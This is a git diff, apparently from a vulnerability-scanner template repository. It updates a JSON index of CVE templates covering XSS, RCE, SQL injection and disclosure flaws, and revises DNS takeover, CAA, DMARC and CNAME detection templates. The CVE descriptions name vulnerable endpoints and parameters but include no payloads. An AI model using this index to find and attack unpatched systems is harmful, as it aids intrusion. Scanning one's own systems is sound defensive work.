Scripting","Severity":"medium","Description":"Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39676.yaml"} +{"ID":"CVE-2023-39677","Info":{"Name":"PrestaShop MyPrestaModules - PhpInfo Disclosure","Severity":"high","Description":"PrestaShop modules by MyPrestaModules expose PHPInfo\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39677.yaml"} +{"ID":"CVE-2023-39700","Info":{"Name":"IceWarp Mail Server v10.4.5 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39700.yaml"} +{"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"} +{"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"} +{"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"} +{"ID":"CVE-2023-4111","Info":{"Name":"PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Bus Reservation System 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index/pickup_id leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4111.yaml"} +{"ID":"CVE-2023-4112","Info":{"Name":"PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting","Severity":"medium","Description":"The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4112.yaml"} +{"ID":"CVE-2023-4113","Info":{"Name":"PHPJabbers Service Booking Script 1.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4113.yaml"} +{"ID":"CVE-2023-4114","Info":{"Name":"PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4114.yaml"} +{"ID":"CVE-2023-4115","Info":{"Name":"PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting","Severity":"medium","Description":"The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4115.yaml"} +{"ID":"CVE-2023-4116","Info":{"Name":"PHPJabbers Taxi Booking 2.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4116.yaml"} +{"ID":"CVE-2023-4148","Info":{"Name":"Ditty \u003c 3.1.25 - Cross-Site Scripting","Severity":"medium","Description":"The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4148.yaml"} +{"ID":"CVE-2023-41538","Info":{"Name":"PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting","Severity":"medium","Description":"PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41538.yaml"} +{"ID":"CVE-2023-41642","Info":{"Name":"RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting","Severity":"medium","Description":"Multiple reflected cross-site scripting (XSS) vulnerabilities in the ErroreNonGestito.aspx component of GruppoSCAI RealGimm 1.1.37p38 allow attackers to execute arbitrary Javascript in the context of a victim user's browser via a crafted payload injected into the VIEWSTATE parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41642.yaml"} +{"ID":"CVE-2023-4168","Info":{"Name":"Adlisting Classified Ads 2.14.0 - Information Disclosure","Severity":"high","Description":"Information disclosure issue in the redirect responses, When accessing any page on the website, Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4168.yaml"} +{"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"} +{"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"} +{"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"} +{"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"} +{"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"} +{"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"} +{"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"} +{"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"} +{"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"} +{"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"} +{"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} +{"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"} +{"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"} +{"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"} +{"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"} +{"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"} +{"ID":"CVE-2023-5244","Info":{"Name":"Microweber \u003c V.2.0 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5244.yaml"} +{"ID":"CVE-2023-5360","Info":{"Name":"WordPress Royal Elementor Addons Plugin \u003c= 1.3.78 - Arbitrary File Upload","Severity":"critical","Description":"Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-5360.yaml"} +{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} +{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} +{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} +{"ID":"CVE-2016-2004","Info":{"Name":"HP Data Protector - Arbitrary Command Execution","Severity":"critical","Description":"HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2016/CVE-2016-2004.yaml"} +{"ID":"CVE-2016-3510","Info":{"Name":"Oracle WebLogic Server Java Object Deserialization - Remote Code Execution","Severity":"critical","Description":"Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2016/CVE-2016-3510.yaml"} +{"ID":"CVE-2017-3881","Info":{"Name":"Cisco IOS 12.2(55)SE11 - Remote Code Execution","Severity":"critical","Description":"A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2017/CVE-2017-3881.yaml"} +{"ID":"CVE-2017-5645","Info":{"Name":"Apache Log4j Server - Deserialization Command Execution","Severity":"critical","Description":"In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2017/CVE-2017-5645.yaml"} +{"ID":"CVE-2018-2628","Info":{"Name":"Oracle WebLogic Server Deserialization - Remote Code Execution","Severity":"critical","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contains an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2018/CVE-2018-2628.yaml"} +{"ID":"CVE-2018-2893","Info":{"Name":"Oracle WebLogic Server - Remote Code Execution","Severity":"critical","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2018/CVE-2018-2893.yaml"} +{"ID":"CVE-2020-11981","Info":{"Name":"Apache Airflow \u003c=1.10.10 - Command Injection","Severity":"critical","Description":"An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-11981.yaml"} +{"ID":"CVE-2020-1938","Info":{"Name":"Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability","Severity":"critical","Description":"When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-1938.yaml"} +{"ID":"CVE-2020-7247","Info":{"Name":"OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution","Severity":"critical","Description":"OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-7247.yaml"} +{"ID":"CVE-2021-44521","Info":{"Name":"Apache Cassandra Load UDF RCE","Severity":"critical","Description":"When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.","Classification":{"CVSSScore":"9.1"}},"file_path":"network/cves/2021/CVE-2021-44521.yaml"} +{"ID":"CVE-2022-0543","Info":{"Name":"Redis Sandbox Escape - Remote Code Execution","Severity":"critical","Description":"This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The\nvulnerability was introduced by Debian and Ubuntu Redis packages that\ninsufficiently sanitized the Lua environment. The maintainers failed to\ndisable the package interface, allowing attackers to load arbitrary libraries.\n","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2022/CVE-2022-0543.yaml"} +{"ID":"CVE-2022-24706","Info":{"Name":"CouchDB Erlang Distribution - Remote Command Execution","Severity":"critical","Description":"In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2022/CVE-2022-24706.yaml"} +{"ID":"CVE-2022-31793","Info":{"Name":"muhttpd \u003c=1.1.5 - Local Inclusion","Severity":"high","Description":"muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2022/CVE-2022-31793.yaml"} +{"ID":"CVE-2023-33246","Info":{"Name":"RocketMQ \u003c= 5.1.0 - Remote Code Execution","Severity":"critical","Description":"For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2023/CVE-2023-33246.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 682df38b16..6df32ecb8f 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -b830e8b5ef413ec8d972848bd93b95d8 +66dfa2bf73baea2b9f3865cf5e919966 diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index e7dd0ca949..c7c350400a 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-404 - tags: dns,takeover,azure metadata: max-request: 1 + tags: dns,takeover,azure dns: - name: "{{FQDN}}" @@ -50,9 +50,8 @@ dns: - "NXDOMAIN" extractors: - - type: regex - group: 1 - regex: - - "IN\tCNAME\t(.+)" + - type: dsl + dsl: + - cname -# Enhanced by mp on 2022/03/13 +# digest: 4a0a00473045022043d1113417de308936591aa35f8175c25ad9d5b66b6d076fe0ba324450b1799e022100add5bb113b494d920eb39a99c107f2e7dff1979d482302e2580ff07e5857d9ff:922c64590222798bb761d5b6d8e72950 diff --git a/dns/caa-fingerprint.yaml b/dns/caa-fingerprint.yaml index 410f68921e..e95df8b131 100644 --- a/dns/caa-fingerprint.yaml +++ b/dns/caa-fingerprint.yaml @@ -9,18 +9,17 @@ info: - https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record classification: cwe-id: CWE-200 - tags: dns,caa metadata: max-request: 1 + tags: dns,caa dns: - name: "{{FQDN}}" type: CAA - matchers: - - type: word - words: - - "IN\tCAA" + - type: regex + regex: + - "IN\\s+CAA\\s+(.+)" extractors: - type: regex @@ -28,4 +27,6 @@ dns: regex: - 'issue "(.*)"' - 'issuewild "(.*)"' - - 'iodef "(.*)"' \ No newline at end of file + - 'iodef "(.*)"' + +# digest: 4a0a00473045022023198a26073ed129fe588c545c89a003975219e7da0033744c267d99093324370221008a42dc42e882b45ff2f7ef81ffd916e41dab50a710deb2d0c7268bf9dec11e8f:922c64590222798bb761d5b6d8e72950 diff --git a/dns/cname-fingerprint.yaml b/dns/cname-fingerprint.yaml deleted file mode 100644 index f4bd14987a..0000000000 --- a/dns/cname-fingerprint.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: cname-fingerprint - -info: - name: CNAME Fingerprint - author: pdteam - severity: info - description: A CNAME DNS record was discovered. - reference: - - https://www.theregister.com/2021/02/24/dns_cname_tracking/ - - https://www.ionos.com/digitalguide/hosting/technical-matters/cname-record/ - classification: - cwe-id: CWE-200 - tags: dns,cname - metadata: - max-request: 1 - -dns: - - name: "{{FQDN}}" - type: CNAME - - matchers: - - type: word - words: - - "IN\tCNAME" - - extractors: - - type: regex - group: 1 - regex: - - "IN\tCNAME\t(.+)" \ No newline at end of file diff --git a/dns/cname-service.yaml b/dns/cname-service.yaml deleted file mode 100644 index ff9ebbd14a..0000000000 --- a/dns/cname-service.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: cname-service - -info: - name: CNAME Service Detection - author: pdteam - severity: info - description: A CNAME service was detected. - reference: - - https://ns1.com/resources/cname - classification: - cwe-id: CWE-200 - tags: dns,service - metadata: - max-request: 1 - -dns: - - name: "{{FQDN}}" - type: CNAME - - matchers-condition: or - matchers: - - type: word - name: zendesk - words: - - "zendesk.com" - - - type: word - name: github - words: - - "github.io" - - - type: word - name: announcekit - words: - - "cname.announcekit.app" - - - type: word - name: wix - words: - - "wixdns.net" - - - type: word - name: salesforce-community - words: - - "live.siteforce.com" \ No newline at end of file diff --git a/dns/detect-dangling-cname.yaml b/dns/detect-dangling-cname.yaml index 873f361230..f72768edbf 100644 --- a/dns/detect-dangling-cname.yaml +++ b/dns/detect-dangling-cname.yaml @@ -12,9 +12,9 @@ info: - https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover classification: cwe-id: CWE-200 - tags: dns,takeover metadata: max-request: 1 + tags: dns,takeover dns: - name: "{{FQDN}}" @@ -26,14 +26,13 @@ dns: words: - "NXDOMAIN" - - type: word - words: - - "IN\tCNAME" + - type: regex + regex: + - "IN\tCNAME\\t(.+)$" extractors: - - type: regex - group: 1 - regex: - - "IN\tCNAME\t(.+)" + - type: dsl + dsl: + - cname -# Enhanced by mp on 2022/03/13 +# digest: 4a0a00473045022100ec9f942301604384f1ef3a2f9987cd29d437e35e882b86ed15127558bfe7ff7302203de45942e5824f5074f3d30b9d3323394b8fbd95c30e519c99901086ad64eecc:922c64590222798bb761d5b6d8e72950 diff --git a/dns/dmarc-detect.yaml b/dns/dmarc-detect.yaml index 2754966097..cdb70ed656 100644 --- a/dns/dmarc-detect.yaml +++ b/dns/dmarc-detect.yaml @@ -11,15 +11,20 @@ info: - https://dmarc.org/wiki/FAQ#Why_is_DMARC_important.3F classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: dns,dmarc metadata: max-request: 1 + tags: dns,dmarc dns: - name: "_dmarc.{{FQDN}}" type: TXT + matchers: + - type: regex + part: answer + regex: + - "IN\tTXT\\t(.+)$" extractors: - type: regex @@ -27,4 +32,4 @@ dns: regex: - "IN\tTXT\t(.+)" -# Enhanced by md on 2023/04/20 +# digest: 4a0a0047304502204076c7a56a64102033ddcbffe604e0099b21d4e3fc93681f25db84b6c9ea0d49022100cc84a29967d71f3d07b107990f34ec5d804757336391661727adf79dc07eef3d:922c64590222798bb761d5b6d8e72950 diff --git a/dns/dns-saas-service-detection.yaml b/dns/dns-saas-service-detection.yaml new file mode 100644 index 0000000000..d82de2443e --- /dev/null +++ b/dns/dns-saas-service-detection.yaml @@ -0,0 +1,437 @@ +id: dns-saas-service-detection + +info: + name: DNS SaaS Service Detection + author: noah @thesubtlety,pdteam + severity: info + description: A CNAME DNS record was discovered + reference: + - https://ns1.com/resources/cname + - https://www.theregister.com/2021/02/24/dns_cname_tracking/ + - https://www.ionos.com/digitalguide/hosting/technical-matters/cname-record/ + metadata: + max-request: 1 + tags: dns,service + +dns: + - name: "{{FQDN}}" + type: CNAME + + extractors: + - type: dsl + dsl: + - cname + + matchers-condition: or + matchers: + - type: word + part: answer + name: ms-office + words: + - outlook.com + - office.com + + - type: word + part: answer + name: azure + words: + - "azure-api.net" + - "azure.com" + - "azure-mobile.net" + - "azurecontainer.io" + - "azurecr.io" + - "azuredatalakestore.net" + - "azureedge.net" + - "azurefd.net" + - "azurehdinsight.net" + - 